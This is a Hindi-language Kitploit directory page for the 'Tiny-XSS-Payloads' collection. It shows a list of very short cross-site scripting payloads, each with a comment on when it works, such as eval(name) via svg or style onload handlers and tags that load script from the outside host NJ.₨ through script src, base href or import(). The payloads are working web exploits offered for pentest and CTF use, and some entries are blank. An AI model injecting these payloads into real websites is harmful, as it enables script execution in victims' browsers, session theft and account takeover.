Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Tiny-XSS-Payloads — विभिन्न संदर्भों में उपयोग किए जा सकने वाले छोटे XSS Payloads का संग्रह. https://tinyxss.terjanq.me | Kitploit
उपकरण/GitHubGitHub/terjanq/tiny-xss-payloads
पेलोड जनरेशनवेब सुरक्षाCTFचयनित संसाधन
GitHubterjanq/tiny-xss-payloads

Tiny-XSS-Payloads

विभिन्न संदर्भों में उपयोग किए जा सकने वाले छोटे XSS Payloads का संग्रह. https://tinyxss.terjanq.me

रिपॉजिटरी देखें
2.4k21841 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
वेबसाइट
साझा करें

Tiny-XSS-Payloads

छोटे XSS पेलोड का एक संग्रह जो विभिन्न संदर्भों में उपयोग किए जा सकते हैं।

डेमो यहाँ उपलब्ध है: https://tinyxss.terjanq.me

वर्तमान पेलोड

root@kitploit:~
<!-- सिंक के बाद DOM में एक सापेक्ष स्क्रिप्ट सम्मिलित करने की आवश्यकता है,
  उदा. <base/href=//NJ.₨> ... <script src=/aaa></script> -->
<base/href=//NJ.₨>
root@kitploit:~
<!-- केवल रिफ्लेक्टेड XSS के रूप में काम करता है -->
<svg/onload=eval(name)>
root@kitploit:~
<!-- यदि आप URL को नियंत्रित करते हैं -->
<svg/onload=eval(`'`+URL)>
root@kitploit:~
<!-- यदि आप नाम को नियंत्रित करते हैं, लेकिन unsafe-eval सक्षम नहीं है -->
<svg/onload=location=name>
root@kitploit:~
<!-- क्रोम में, innerHTML के अंदर भी काम करता है, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->
<svg><svg/onload=eval(name)>
root@kitploit:~
<!-- यदि आप विंडो के नाम को नियंत्रित करते हैं, तो यह पेलोड innerHTML के अंदर काम करेगा, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->
<audio/src/onerror=eval(name)>
root@kitploit:~
<!-- यदि आप URL को नियंत्रित करते हैं, तो यह पेलोड innerHTML के अंदर काम करेगा, उन तत्वों पर भी जो अभी तक DOM में सम्मिलित नहीं हुए हैं -->

root@kitploit:~
<!-- बस एक सामान्य स्क्रिप्ट -->
<script/src=//NJ.₨></script>
root@kitploit:~
<!-- यदि आप विंडो का नाम नियंत्रित करते हैं -->

root@kitploit:~
<!-- यदि आप URL को नियंत्रित करते हैं -->

root@kitploit:~
<!-- यदि पृष्ठ पर iframes की संख्या स्थिर है -->

root@kitploit:~
<!-- केवल फ़ायरफ़ॉक्स के लिए -->
<script/href=//NJ.₨ />">
root@kitploit:~
<!-- यदि पृष्ठ पर iframes की संख्या यादृच्छिक है -->

root@kitploit:~
<!-- यदि CSP में unsafe-inline अक्षम है और बाहरी स्क्रिप्ट की अनुमति है -->
</script>">
root@kitploit:~
<!-- यदि इनलाइन स्टाइल की अनुमति है -->
<style/onload=eval(name)>
root@kitploit:~
<!-- यदि इनलाइन स्टाइल की अनुमति है और URL को नियंत्रित किया जा सकता है -->
<style/onload=eval(`'`+URL)>
root@kitploit:~
<!-- यदि इनलाइन स्टाइल अवरुद्ध हैं -->
<style/onerror=eval(name)>
root@kitploit:~
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है, innerHTML में काम नहीं करता -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->
<svg/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है, यदि इनलाइन स्टाइल की अनुमति है तो ट्रिगर होता है -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->
<style/onload=import(/\\NJ.₨/)>
root@kitploit:~
<!-- बाहरी स्क्रिप्ट को आयात के रूप में उपयोग करता है -->
<!-- PoC केवल https और क्रोम पर काम करता है, क्योंकि NJ.₨ Sec-Fetch-Dest हेडर की जाँच करता है -->

अप्रचलित:

root@kitploit:~
<!-- यदि आप URL को नियंत्रित करते हैं, केवल Safari -->

root@kitploit:~
<!-- यदि इनलाइन स्टाइल की अनुमति है, केवल Safari -->
<style/onload=write(URL)>
टूल डाउनलोड करें